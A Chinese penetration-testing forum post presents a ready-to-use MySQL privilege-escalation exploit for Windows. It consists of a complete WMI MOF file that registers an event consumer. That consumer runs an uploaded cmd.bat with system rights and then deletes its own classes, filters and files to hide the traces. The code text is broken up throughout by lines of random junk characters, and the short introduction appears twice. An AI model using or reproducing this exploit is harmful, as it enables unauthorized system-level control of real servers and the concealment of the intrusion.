中国网络渗透测试联盟
标题:
Mysql 提权即时无错Mof exp
[打印本页]
作者:
admin
时间:
2013-2-14 00:05
标题:
Mysql 提权即时无错Mof exp
这个sql提权MOF需要运行 system下的文件,不能定义路径。
8 q3 p( L* @" K& F) z* n
需要将要运行的命令写入到bat上传到system32目录,然后执行。
8 z9 e. s" O( V5 ^; @& _$ o
2 J+ v9 F# B7 ]
这个sql提权MOF需要运行 system下的文件,不能定义路径。
5 f" j# _2 m1 O, G: X
需要将要运行的命令写入到bat上传到system32目录,然后执行。
4 I, \7 ~, v: y8 h$ ^0 e
( x/ U3 I P, [& |5 D
#pragma
) d/ Z1 b/ }9 h) M( p
namespace("\\\\.\\root\\cimv2")
2 g! f& V3 A6 n; t1 C# y3 s
class
0 K8 p% F/ y, F" X5 @
MyClass547
$ X6 V1 ]2 F5 L" [# A0 D
{ [key]
5 Q. i' q1 v$ n
string
2 t& @ P! ?' k% O
Name;
, a! S) I4 g, ~# ~& J' }! s1 ?; e
};
+ Q8 H; q9 p5 l' O- s5 j# x# z
class
t: g" [% |: Z/ I) i+ h0 z E( U
ActiveScriptEventConsumer
9 m8 t+ @* p' S0 N' t# P
: __EventConsumer { [key]
5 U" W2 k/ }! m' G( g+ m2 G
string
2 p- \& r7 K# r4 g/ @" K' S: E' `
Name; [not_null]
& W& x0 L/ f$ y8 _
string
1 A) B B& x& h9 k! g
ScriptingEngine; string
1 V8 H, `; h+ d5 X$ r
ScriptFileName; [template]
# r) v" B& K. g6 H6 ?
string
7 d( l& l3 \' k
ScriptText; uint32 KillTimeout;
6 v( J; m$ f2 }, a2 I
}; instance of __Win32Provider as $P {
: t; i0 L1 _1 i4 a6 g
Name
/ d* p$ j2 V* ]9 _! |
=
( S' q- ?, s: |5 T! q' v, M. e, n( Z) `
"ActiveScriptEventConsumer"; CLSID =
$ Z7 E; k9 w; n" n7 F, P) ]
"{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
- n2 ^! l* @' g% c
PerUserInitialization
) j# b9 C. {: v3 g9 H6 x
= TRUE;
3 d8 z* X7 ?% v# P
}; instance of __EventConsumerProviderRegistration { Provider
# j8 R% A7 L: s
= $P; ConsumerClassNames
& _! d% T+ I ?; f5 N
=
$ Q( |: E. N/ M* l& y; x
{"ActiveScriptEventConsumer"};
1 O# z( Y( p; ^4 r, a, p5 {7 i$ d2 m( u
};
' K. ^4 {' t8 {/ g9 m1 Y/ t6 S
Instance of ActiveScriptEventConsumer
8 M3 U3 u3 u7 c/ R
as $cons { Name
7 r# t. a) ~& D0 O; D
=
- C, G$ X8 f4 q+ h8 \1 r/ @/ M% t
"ASEC"; ScriptingEngine
0 E% }. u. S8 E5 P1 J e
=
# d* H( F5 ?" r5 H. E; |6 z: @
"JScript"; ScriptText
" K2 i4 L% x4 ~+ D9 o
=
/ v' ^ I5 Z) D; M* `
"\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };
; U' C' Z- b$ w% w
Instance of ActiveScriptEventConsumer
1 g( l- H9 M) D8 @6 K, |5 Y
as $cons2 { Name
_, a4 n4 R; Z- r# G6 W: f
=
8 n8 P% J# d5 N" g7 C8 c% d
"qndASEC"; ScriptingEngine
( l5 L+ u7 q+ d' \) B* e
=
5 o* a! L% t* D- N, c9 \; Q, I
"JScript"; ScriptText
! P, t& _. j ]; W% c
=
. y# ?. q: F6 h' j" ~$ o$ M
"\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
" |6 u3 k# ~/ `& O8 v( L
}; instance of __EventFilter as $Filt { Name
) M7 S" c8 K. F$ c
=
7 ~( E5 k; [8 z0 y
"instfilt"; Query
+ w& r+ d3 v4 b: {$ R6 F9 n6 V9 Q
=
3 ]3 k @0 L( @
"SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage
q) `9 {- F. @' ?! @) H$ Z% z
=
% o" s, p# ~4 e l# b8 \* H
"WQL"; }; instance of __EventFilter as $Filt2 { Name
5 b: i: Z$ W: p% E3 W
=
5 L4 H. G+ `3 @0 |
"qndfilt"; Query
; W7 z- z' C$ e6 m
=
; t& @% A8 g( Z% g# |& l
"SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage
; E6 k( R3 t' k6 A
=
" Q8 w' _+ ]8 f+ o d# h" Z! L
"WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer
7 p! r; g* v/ K% }$ q
= $cons; Filter
! S6 B' `& F) P, r6 b& N( G
= $Filt;
2 `# R8 I4 N T4 A ~
}; instance of __FilterToConsumerBinding as $bind2 { Consumer
4 Q- S* b( g& Y, q+ q% n
= $cons2; Filter
* R# g9 Q9 W5 x' ?. D' \$ W& _+ i
= $Filt2;
; J. l2 I5 F7 \: ]: a2 r) Q
}; instance of MyClass547
! H$ i5 y# ]* ~) {9 B
as $MyClass { Name
g A! @2 b- H! ~$ g$ }# g5 G5 P
=
n4 ~: V' w: S3 B" k
"ClassConsumer";
- D. u3 | Q7 W
};
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2